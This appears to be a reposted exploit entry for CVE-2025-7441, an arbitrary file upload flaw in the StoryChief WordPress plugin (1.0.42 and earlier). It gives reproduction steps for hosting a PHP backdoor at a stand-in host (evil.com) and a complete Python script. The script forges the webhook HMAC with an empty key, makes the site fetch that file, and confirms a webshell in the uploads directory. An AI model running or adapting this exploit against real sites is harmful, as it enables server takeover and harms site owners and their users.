StoryChief WordPress插件任意文件上传漏洞分析与利用

本文详细分析了StoryChief WordPress插件1.0.42版本中的任意文件上传漏洞(CVE-2025-7441),包含完整的漏洞复现步骤和Python利用代码,攻击者可通过此漏洞上传恶意PHP文件获取服务器控制权。

Exploit Title: StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload

Exploit Author: xpl0dec

Vendor Homepage: https://www.storychief.io/wordpress-content-scheduler

Software Link: https://github.com/Story-Chief/wordpress/

Version: <= 1.0.42

Tested on: Linux

CVE : CVE-2025-7441

CVSS Score : 9.8

Step to reproduce :

1. Create a file with the .php extension and fill it with:

<?php

header(“Content-Type: image/jpeg”);

echo “”;

?>

2. Adjust the echo phpinfo section as needed

3. Host it on a VPS/web server with the name you want to upload, for example backdoor.php

4. The second argument is the URL of the backdoor created earlier, e.g., http://evil.com/backdoor.php

5. Then run the exploit: python3 CVE-2025-7441.py <wordpress_url> <backdoor_url> 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97

from datetime import datetime
import requests
import json
import hmac
import hashlib
import sys
import time
import os

def banner():
	print(r"""
  _   _  ____ _____ _   _ _____ _  __  ____    _ __   __
 | \ | |/ ___| ____| | | | ____| |/ / |  _ \  / \\ \ / /
 |  \| | |  _|  _| | |_| |  _| | ' /  | | | |/ _ \\ V / 
 | |\  | |_| | |___|  _  | |___| . \  | |_| / ___ \| |  
 |_| \_|\____|_____|_| |_|_____|_|\_\ |____/_/   \_\_|  
                                                        
  PoC exploit CVE-2025-7441 by xpl0dec
	""")

if __name__ == "__main__":
    banner()
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_url> <backdoor_url>")
        sys.exit(1)

    url = sys.argv[1] + "/wp-json/storychief/webhook"

    dummy = {
        "meta": {
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }

    json_string = json.dumps(dummy, separators=(',', ':'), ensure_ascii=True)
    json_string = json_string.replace("/", "\\/").encode()

    signature = hmac.new(
        "".encode(),
        json_string,
        digestmod=hashlib.sha256
    ).hexdigest()


    headers = {
        "Content-Type": "application/json"
    }

    payload = {
        "meta": {
            "mac" : signature,
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }


    print("[+] get hmac... [+]")
    time.sleep(2)
    print("hmac : " + signature)


    response = requests.post(url, headers=headers, data=json.dumps(payload))

    if "permalink" in response.text:
        print("[+] Response Success [+]")
        time.sleep(2)
        print("[+] Check backdoor from uploaded... [+]")

    current_datetime = datetime.now()
    month = str(current_datetime.month).zfill(2)
    year = current_datetime.year
    file_backdoor = os.path.basename(sys.argv[2])
    
    get_backdoor = requests.get(sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")

    if get_backdoor.status_code == 200:
        print("[+] Exploitation Success [+]")
        time.sleep(2)
        print("webshell uploaded in : " + sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")
comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次